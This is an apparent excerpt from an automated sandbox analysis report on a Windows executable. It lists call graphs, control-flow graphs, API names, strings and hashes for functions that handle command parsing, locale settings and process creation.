7ff7d151c541 22540->22545 22541->22540 22542 7ff7d151ff70 2 API calls 22542->22539 22543 7ff7d151b6b0 170 API calls 22543->22545 22544->22543 22544->22545 22545->22539 22545->22542 22546->22207 22548 7ff7d15172de 22547->22548 22549 7ff7d1534621 22547->22549 22551 7ff7d15172eb 22548->22551 22555 7ff7d1534467 22548->22555 22556 7ff7d1534530 22548->22556 22550 7ff7d15347e0 22549->22550 22552 7ff7d153447b longjmp 22549->22552 22557 7ff7d1534639 22549->22557 22564 7ff7d153475e 22549->22564 22553 7ff7d1517348 168 API calls 22550->22553 22608 7ff7d1517348 22551->22608 22558 7ff7d1534492 22552->22558 22607 7ff7d1534524 22553->22607 22555->22551 22555->22558 22567 7ff7d1534475 22555->22567 22563 7ff7d1517348 168 API calls 22556->22563 22560 7ff7d153463e 22557->22560 22561 7ff7d1534695 22557->22561 22562 7ff7d1517348 168 API calls 22558->22562 22560->22552 22580 7ff7d1534654 22560->22580 22566 7ff7d15173d4 168 API calls 22561->22566 22569 7ff7d15344a8 22562->22569 22570 7ff7d1534549 22563->22570 22568 7ff7d1517348 168 API calls 22564->22568 22565 7ff7d1517315 22623 7ff7d15173d4 22565->22623 22594 7ff7d153469a 22566->22594 22567->22552 22567->22561 22568->22550 22581 7ff7d15344e2 22569->22581 22586 7ff7d1517348 168 API calls 22569->22586 22574 7ff7d15345b2 22570->22574 22582 7ff7d153455e 22570->22582 22593 7ff7d1517348 168 API calls 22570->22593 22571 7ff7d15172b0 168 API calls 22575 7ff7d153480e 22571->22575 22572 7ff7d1517348 168 API calls 22572->22565 22576 7ff7d1517348 168 API calls 22574->22576 22575->22249 22579 7ff7d15345c7 22576->22579 22577 7ff7d15172b0 168 API calls 22588 7ff7d1534738 22577->22588 22578 7ff7d15346e1 22578->22577 22585 7ff7d1517348 168 API calls 22579->22585 22583 7ff7d1517348 168 API calls 22580->22583 22587 7ff7d15172b0 168 API calls 22581->22587 22582->22574 22584 7ff7d1517348 168 API calls 22582->22584 22589 7ff7d1517323 22583->22589 22584->22574 22592 7ff7d15345db 22585->22592 22586->22581 22590 7ff7d15344f1 22587->22590 22591 7ff7d1517348 168 API calls 22588->22591 22589->22249 22596 7ff7d15172b0 168 API calls 22590->22596 22591->22607 22595 7ff7d1517348 168 API calls 22592->22595 22593->22582 22594->22578 22598 7ff7d15346ea 22594->22598 22599 7ff7d15346c7 22594->22599 22600 7ff7d15345ec 22595->22600 22597 7ff7d1534503 22596->22597 22597->22589 22603 7ff7d1517348 168 API calls 22597->22603 22601 7ff7d1517348 168 API calls 22598->22601 22599->22578 22604 7ff7d1517348 168 API calls 22599->22604 22602 7ff7d1517348 168 API calls 22600->22602 22601->22578 22605 7ff7d1534600 22602->22605 22603->22607 22604->22578 22606 7ff7d1517348 168 API calls 22605->22606 22606->22607 22607->22571 22607->22589 22615 7ff7d151735d 22608->22615 22609 7ff7d1513278 166 API calls 22610 7ff7d1534820 longjmp 22609->22610 22611 7ff7d1534838 22610->22611 22612 7ff7d1513278 166 API calls 22611->22612 22613 7ff7d1534844 longjmp 22612->22613 22614 7ff7d153485a 22613->22614 22616 7ff7d1517348 166 API calls 22614->22616 22615->22609 22615->22611 22615->22615 22622 7ff7d15173ab 22615->22622 22617 7ff7d153487b 22616->22617 22618 7ff7d1517348 166 API calls 22617->22618 22619 7ff7d15348ad 22618->22619 22620 7ff7d1517348 166 API calls 22619->22620 22621 7ff7d15172ff 22620->22621 22621->22565 22621->22572 22624 7ff7d1517401 22623->22624 22624->22589 22625 7ff7d1517348 168 API calls 22624->22625 22626 7ff7d153487b 22625->22626 22627 7ff7d1517348 168 API calls 22626->22627 22628 7ff7d15348ad 22627->22628 22629 7ff7d1517348 168 API calls 22628->22629 22630 7ff7d15348be 22629->22630 22630->22589

                                                                                                                                                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1520A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3305344409-4288247545
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 26f6fce0b16e7127b0682493bc88e9228820a00b601e91ffb9aa57b5547d5f30
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0042D662A0968B85FB50AB1198502BEE7A1EF85794FD44272DD1F877F5DFBCE0448320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 216 7ff7d151aa54-7ff7d151aa98 call 7ff7d151cd90 219 7ff7d152bf5a-7ff7d152bf70 call 7ff7d1524c1c call 7ff7d151ff70 216->219 220 7ff7d151aa9e 216->220 222 7ff7d151aaa5-7ff7d151aaa8 220->222 224 7ff7d151acde-7ff7d151ad00 222->224 225 7ff7d151aaae-7ff7d151aac8 wcschr 222->225 229 7ff7d151ad06 224->229 225->224 227 7ff7d151aace-7ff7d151aae9 towlower 225->227 227->224 228 7ff7d151aaef-7ff7d151aaf3 227->228 231 7ff7d152beb7-7ff7d152bec4 call 7ff7d153eaf0 228->231 232 7ff7d151aaf9-7ff7d151aafd 228->232 233 7ff7d151ad0d-7ff7d151ad1f 229->233 246 7ff7d152bec6-7ff7d152bed8 call 7ff7d1513240 231->246 247 7ff7d152bf43-7ff7d152bf59 call 7ff7d1524c1c 231->247 235 7ff7d152bbcf 232->235 236 7ff7d151ab03-7ff7d151ab07 232->236 237 7ff7d151ad22-7ff7d151ad2a call 7ff7d15213e0 233->237 249 7ff7d152bbde 235->249 239 7ff7d151ab09-7ff7d151ab0d 236->239 240 7ff7d151ab7d-7ff7d151ab81 236->240 237->222 243 7ff7d151ab13-7ff7d151ab17 239->243 244 7ff7d152be63 239->244 240->244 248 7ff7d151ab87-7ff7d151ab95 240->248 243->240 251 7ff7d151ab19-7ff7d151ab1d 243->251 257 7ff7d152be72-7ff7d152be88 call 7ff7d1513278 call 7ff7d1524c1c 244->257 246->247 263 7ff7d152beda-7ff7d152bee9 call 7ff7d1513240 246->263 247->219 250 7ff7d151ab98-7ff7d151aba0 248->250 255 7ff7d152bbea-7ff7d152bbec 249->255 250->250 254 7ff7d151aba2-7ff7d151abb3 call 7ff7d151cd90 250->254 251->249 256 7ff7d151ab23-7ff7d151ab27 251->256 254->219 269 7ff7d151abb9-7ff7d151abde call 7ff7d15213e0 call 7ff7d15233a8 254->269 265 7ff7d152bbf8-7ff7d152bc01 255->265 256->255 261 7ff7d151ab2d-7ff7d151ab31 256->261 284 7ff7d152be89-7ff7d152be8c 257->284 261->229 266 7ff7d151ab37-7ff7d151ab3b 261->266 277 7ff7d152beeb-7ff7d152bef1 263->277 278 7ff7d152bef3-7ff7d152bef9 263->278 265->233 266->265 270 7ff7d151ab41-7ff7d151ab45 266->270 307 7ff7d151abe4-7ff7d151abe7 269->307 308 7ff7d151ac75 269->308 274 7ff7d151ab4b-7ff7d151ab4f 270->274 275 7ff7d152bc06-7ff7d152bc2a call 7ff7d15213e0 270->275 282 7ff7d151ad2f-7ff7d151ad33 274->282 283 7ff7d151ab55-7ff7d151ab78 call 7ff7d15213e0 274->283 294 7ff7d152bc5a-7ff7d152bc61 275->294 295 7ff7d152bc2c-7ff7d152bc4c _wcsnicmp 275->295 277->247 277->278 278->247 279 7ff7d152befb-7ff7d152bf0d call 7ff7d1513240 278->279 279->247 305 7ff7d152bf0f-7ff7d152bf21 call 7ff7d1513240 279->305 288 7ff7d151ad39-7ff7d151ad3d 282->288 289 7ff7d152bc66-7ff7d152bc8a call 7ff7d15213e0 282->289 283->222 291 7ff7d151acbe 284->291 292 7ff7d152be92-7ff7d152beaa call 7ff7d1513278 call 7ff7d1524c1c 284->292 297 7ff7d152bcde-7ff7d152bd02 call 7ff7d15213e0 288->297 298 7ff7d151ad43-7ff7d151ad49 288->298 325 7ff7d152bc8c-7ff7d152bcaa _wcsnicmp 289->325 326 7ff7d152bcc4-7ff7d152bcdc 289->326 301 7ff7d151acc0-7ff7d151acc7 291->301 337 7ff7d152beab-7ff7d152beb6 call 7ff7d1524c1c 292->337 311 7ff7d152bd31-7ff7d152bd4f _wcsnicmp 294->311 295->294 306 7ff7d152bc4e-7ff7d152bc55 295->306 331 7ff7d152bd2a 297->331 332 7ff7d152bd04-7ff7d152bd24 _wcsnicmp 297->332 309 7ff7d152bd5e-7ff7d152bd65 298->309 310 7ff7d151ad4f-7ff7d151ad68 298->310 301->301 313 7ff7d151acc9-7ff7d151acda 301->313 305->247 339 7ff7d152bf23-7ff7d152bf35 call 7ff7d1513240 305->339 320 7ff7d152bbb3-7ff7d152bbb7 306->320 307->291 322 7ff7d151abed-7ff7d151ac0b call 7ff7d151cd90 * 2 307->322 317 7ff7d151ac77-7ff7d151ac7f 308->317 309->310 321 7ff7d152bd6b-7ff7d152bd73 309->321 323 7ff7d151ad6a 310->323 324 7ff7d151ad6d-7ff7d151ad70 310->324 318 7ff7d152bbc2-7ff7d152bbca 311->318 319 7ff7d152bd55 311->319 313->224 317->291 328 7ff7d151ac81-7ff7d151ac85 317->328 318->222 319->309 333 7ff7d152bbba-7ff7d152bbbd call 7ff7d15213e0 320->333 334 7ff7d152bd79-7ff7d152bd8b iswxdigit 321->334 335 7ff7d152be4a-7ff7d152be5e 321->335 322->337 358 7ff7d151ac11-7ff7d151ac14 322->358 323->324 324->237 325->326 329 7ff7d152bcac-7ff7d152bcbf 325->329 326->311 340 7ff7d151ac88-7ff7d151ac8f 328->340 329->320 331->311 332->331 338 7ff7d152bbac 332->338 333->318 334->335 342 7ff7d152bd91-7ff7d152bda3 iswxdigit 334->342 335->333 337->231 338->320 339->247 354 7ff7d152bf37-7ff7d152bf3e call 7ff7d1513240 339->354 340->340 345 7ff7d151ac91-7ff7d151ac94 340->345 342->335 347 7ff7d152bda9-7ff7d152bdbb iswxdigit 342->347 345->291 351 7ff7d151ac96-7ff7d151acaa wcsrchr 345->351 347->335 352 7ff7d152bdc1-7ff7d152bdd7 iswdigit 347->352 351->291 355 7ff7d151acac-7ff7d151acb9 call 7ff7d1521300 351->355 356 7ff7d152bdd9-7ff7d152bddd 352->356 357 7ff7d152bddf-7ff7d152bdeb towlower 352->357 354->247 355->291 359 7ff7d152bdee-7ff7d152be0f iswdigit 356->359 357->359 358->337 360 7ff7d151ac1a-7ff7d151ac33 memset 358->360 363 7ff7d152be17-7ff7d152be23 towlower 359->363 364 7ff7d152be11-7ff7d152be15 359->364 360->308 365 7ff7d151ac35-7ff7d151ac4b wcschr 360->365 366 7ff7d152be26-7ff7d152be45 call 7ff7d15213e0 363->366 364->366 365->308 367 7ff7d151ac4d-7ff7d151ac54 365->367 366->335 368 7ff7d151ac5a-7ff7d151ac6f wcschr 367->368 369 7ff7d151ad72-7ff7d151ad91 wcschr 367->369 368->308 368->369 371 7ff7d151ad97-7ff7d151adac wcschr 369->371 372 7ff7d151af03-7ff7d151af07 369->372 371->372 373 7ff7d151adb2-7ff7d151adc7 wcschr 371->373 372->308 373->372 374 7ff7d151adcd-7ff7d151ade2 wcschr 373->374 374->372 375 7ff7d151ade8-7ff7d151adfd wcschr 374->375 375->372 376 7ff7d151ae03-7ff7d151ae18 wcschr 375->376 376->372 377 7ff7d151ae1e-7ff7d151ae21 376->377 378 7ff7d151ae24-7ff7d151ae27 377->378 378->372 379 7ff7d151ae2d-7ff7d151ae40 iswspace 378->379 380 7ff7d151ae4b-7ff7d151ae5e 379->380 381 7ff7d151ae42-7ff7d151ae49 379->381 382 7ff7d151ae66-7ff7d151ae6d 380->382 381->378 382->382 383 7ff7d151ae6f-7ff7d151ae77 382->383 383->257 384 7ff7d151ae7d-7ff7d151ae97 call 7ff7d15213e0 383->384 387 7ff7d151ae9a-7ff7d151aea4 384->387 388 7ff7d151aebc-7ff7d151aef8 call 7ff7d1520a6c call 7ff7d151ff70 * 2 387->388 389 7ff7d151aea6-7ff7d151aead 387->389 388->317 397 7ff7d151aefe 388->397 389->388 391 7ff7d151aeaf-7ff7d151aeba 389->391 391->387 391->388 397->284
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$:$:$:ON$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 972821348-467788257
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a1cad378b9ebd1b9c19244478a5c33789b3475cf11d36777d6b64c224af23755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1229222A0868B86FB66BF21951427DF6A1EF45B80FC98077D90F473B4DEBDA4448370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15251EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 398 7ff7d15251ec-7ff7d1525248 call 7ff7d1525508 GetLocaleInfoW 401 7ff7d152524e-7ff7d1525272 GetLocaleInfoW 398->401 402 7ff7d152ef32-7ff7d152ef3c 398->402 404 7ff7d1525274-7ff7d152527a 401->404 405 7ff7d1525295-7ff7d15252b9 GetLocaleInfoW 401->405 403 7ff7d152ef3f-7ff7d152ef49 402->403 406 7ff7d152ef4b-7ff7d152ef52 403->406 407 7ff7d152ef61-7ff7d152ef6c 403->407 408 7ff7d15254f7-7ff7d15254f9 404->408 409 7ff7d1525280-7ff7d1525286 404->409 410 7ff7d15252bb-7ff7d15252c3 405->410 411 7ff7d15252de-7ff7d1525305 GetLocaleInfoW 405->411 406->407 414 7ff7d152ef54-7ff7d152ef5f 406->414 417 7ff7d152ef75-7ff7d152ef78 407->417 408->402 409->408 415 7ff7d152528c-7ff7d152528f 409->415 416 7ff7d15252c9-7ff7d15252d7 410->416 410->417 412 7ff7d1525307-7ff7d152531b 411->412 413 7ff7d1525321-7ff7d1525343 GetLocaleInfoW 411->413 412->413 418 7ff7d1525349-7ff7d152536e GetLocaleInfoW 413->418 419 7ff7d152efaf-7ff7d152efb9 413->419 414->403 414->407 415->405 416->411 420 7ff7d152ef99-7ff7d152efa3 417->420 421 7ff7d152ef7a-7ff7d152ef7d 417->421 422 7ff7d152eff2-7ff7d152effc 418->422 423 7ff7d1525374-7ff7d1525396 GetLocaleInfoW 418->423 425 7ff7d152efbc-7ff7d152efc6 419->425 420->419 421->411 424 7ff7d152ef83-7ff7d152ef8d 421->424 426 7ff7d152efff-7ff7d152f009 422->426 427 7ff7d152539c-7ff7d15253be GetLocaleInfoW 423->427 428 7ff7d152f035-7ff7d152f03f 423->428 424->420 429 7ff7d152efc8-7ff7d152efcf 425->429 430 7ff7d152efde-7ff7d152efe9 425->430 431 7ff7d152f00b-7ff7d152f012 426->431 432 7ff7d152f021-7ff7d152f02c 426->432 433 7ff7d152f078-7ff7d152f082 427->433 434 7ff7d15253c4-7ff7d15253e6 GetLocaleInfoW 427->434 435 7ff7d152f042-7ff7d152f04c 428->435 429->430 436 7ff7d152efd1-7ff7d152efdc 429->436 430->422 431->432 437 7ff7d152f014-7ff7d152f01f 431->437 432->428 442 7ff7d152f085-7ff7d152f08f 433->442 438 7ff7d15253ec-7ff7d152540e GetLocaleInfoW 434->438 439 7ff7d152f0bb-7ff7d152f0c5 434->439 440 7ff7d152f04e-7ff7d152f055 435->440 441 7ff7d152f064-7ff7d152f06f 435->441 436->425 436->430 437->426 437->432 446 7ff7d152f0fe-7ff7d152f108 438->446 447 7ff7d1525414-7ff7d1525436 GetLocaleInfoW 438->447 445 7ff7d152f0c8-7ff7d152f0d2 439->445 440->441 448 7ff7d152f057-7ff7d152f062 440->448 441->433 443 7ff7d152f0a7-7ff7d152f0b2 442->443 444 7ff7d152f091-7ff7d152f098 442->444 443->439 444->443 449 7ff7d152f09a-7ff7d152f0a5 444->449 450 7ff7d152f0ea-7ff7d152f0f5 445->450 451 7ff7d152f0d4-7ff7d152f0db 445->451 454 7ff7d152f10b-7ff7d152f115 446->454 452 7ff7d152543c-7ff7d152545e GetLocaleInfoW 447->452 453 7ff7d152f141-7ff7d152f14b 447->453 448->435 448->441 449->442 449->443 450->446 451->450 456 7ff7d152f0dd-7ff7d152f0e8 451->456 457 7ff7d1525464-7ff7d1525486 GetLocaleInfoW 452->457 458 7ff7d152f184-7ff7d152f18b 452->458 455 7ff7d152f14e-7ff7d152f158 453->455 459 7ff7d152f117-7ff7d152f11e 454->459 460 7ff7d152f12d-7ff7d152f138 454->460 461 7ff7d152f15a-7ff7d152f161 455->461 462 7ff7d152f170-7ff7d152f17b 455->462 456->445 456->450 464 7ff7d152548c-7ff7d15254ae GetLocaleInfoW 457->464 465 7ff7d152f1c4-7ff7d152f1ce 457->465 463 7ff7d152f18e-7ff7d152f198 458->463 459->460 466 7ff7d152f120-7ff7d152f12b 459->466 460->453 461->462 467 7ff7d152f163-7ff7d152f16e 461->467 462->458 468 7ff7d152f19a-7ff7d152f1a1 463->468 469 7ff7d152f1b0-7ff7d152f1bb 463->469 470 7ff7d152f207-7ff7d152f20e 464->470 471 7ff7d15254b4-7ff7d15254f5 setlocale call 7ff7d1528f80 464->471 472 7ff7d152f1d1-7ff7d152f1db 465->472 466->454 466->460 467->455 467->462 468->469 474 7ff7d152f1a3-7ff7d152f1ae 468->474 469->465 473 7ff7d152f211-7ff7d152f21b 470->473 476 7ff7d152f1dd-7ff7d152f1e4 472->476 477 7ff7d152f1f3-7ff7d152f1fe 472->477 478 7ff7d152f21d-7ff7d152f224 473->478 479 7ff7d152f233-7ff7d152f23e 473->479 474->463 474->469 476->477 481 7ff7d152f1e6-7ff7d152f1f1 476->481 477->470 478->479 482 7ff7d152f226-7ff7d152f231 478->482 481->472 481->477 482->473 482->479
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2cfb79a8ca0fe75f2f9909264f8608b2b5a74e7f4394c3e4601b634e09182452
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20F15966B1864B85FB11AF11E9102BDA2A5BF05B84FE44177DA1F836B4EFBCE505C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 483 7ff7d1524224-7ff7d15242a5 InitializeProcThreadAttributeList 484 7ff7d15242ab-7ff7d15242e5 UpdateProcThreadAttribute 483->484 485 7ff7d152ecd4-7ff7d152ecee GetLastError call 7ff7d1539eec 483->485 486 7ff7d15242eb-7ff7d15243c6 memset * 2 GetStartupInfoW call 7ff7d1523a90 call 7ff7d151b900 484->486 487 7ff7d152ecf0-7ff7d152ed19 GetLastError call 7ff7d1539eec DeleteProcThreadAttributeList 484->487 492 7ff7d152ed1e 485->492 497 7ff7d1524638-7ff7d1524644 _local_unwind 486->497 498 7ff7d15243cc-7ff7d15243d3 486->498 487->492 499 7ff7d1524649-7ff7d1524650 497->499 498->499 500 7ff7d15243d9-7ff7d15243dc 498->500 499->500 503 7ff7d1524656-7ff7d152465d 499->503 501 7ff7d15243de-7ff7d15243f5 wcsrchr 500->501 502 7ff7d1524415-7ff7d1524424 call 7ff7d1525a68 500->502 501->502 504 7ff7d15243f7-7ff7d152440f lstrcmpW 501->504 509 7ff7d152442a-7ff7d1524486 CreateProcessW 502->509 510 7ff7d1524589-7ff7d1524590 502->510 503->502 506 7ff7d1524663 503->506 504->502 508 7ff7d1524668-7ff7d152466d call 7ff7d1539044 504->508 506->500 508->502 512 7ff7d152448b-7ff7d152448f 509->512 510->509 514 7ff7d1524596-7ff7d15245fa CreateProcessAsUserW 510->514 515 7ff7d1524672-7ff7d1524682 GetLastError 512->515 516 7ff7d1524495-7ff7d15244c7 CloseHandle call 7ff7d152498c 512->516 514->512 518 7ff7d152468d-7ff7d1524694 515->518 516->518 522 7ff7d15244cd-7ff7d15244e5 516->522 520 7ff7d15246a2-7ff7d15246ac 518->520 521 7ff7d1524696-7ff7d15246a0 518->521 523 7ff7d15246ae-7ff7d15246b5 call 7ff7d15297bc 520->523 526 7ff7d1524705-7ff7d1524707 520->526 521->520 521->523 524 7ff7d15244eb-7ff7d15244f2 522->524 525 7ff7d15247a3-7ff7d15247a9 522->525 541 7ff7d15246b7-7ff7d1524701 call 7ff7d156c038 523->541 542 7ff7d1524703 523->542 528 7ff7d15244f8-7ff7d1524507 524->528 529 7ff7d15245ff-7ff7d1524607 524->529 526->522 527 7ff7d152470d-7ff7d152472a call 7ff7d151cd90 526->527 543 7ff7d152472c-7ff7d1524738 _local_unwind 527->543 544 7ff7d152473d-7ff7d1524767 call 7ff7d15213e0 call 7ff7d1539eec call 7ff7d151ff70 _local_unwind 527->544 532 7ff7d152450d-7ff7d1524553 call 7ff7d1525cb4 call 7ff7d15233f0 call 7ff7d152498c 528->532 533 7ff7d1524612-7ff7d1524616 528->533 529->528 534 7ff7d152460d 529->534 566 7ff7d1524558-7ff7d152455e 532->566 539 7ff7d15247d7-7ff7d15247df 533->539 540 7ff7d152461c-7ff7d1524633 533->540 538 7ff7d152476c-7ff7d1524773 534->538 538->528 548 7ff7d1524779-7ff7d1524780 538->548 545 7ff7d15247f2-7ff7d152483c call 7ff7d151ff70 DeleteProcThreadAttributeList call 7ff7d1528f80 539->545 546 7ff7d15247e1-7ff7d15247ed CloseHandle 539->546 540->545 541->526 542->526 543->544 544->538 546->545 548->528 553 7ff7d1524786-7ff7d1524789 548->553 553->528 558 7ff7d152478f-7ff7d1524792 553->558 558->525 562 7ff7d1524794-7ff7d152479d call 7ff7d153a250 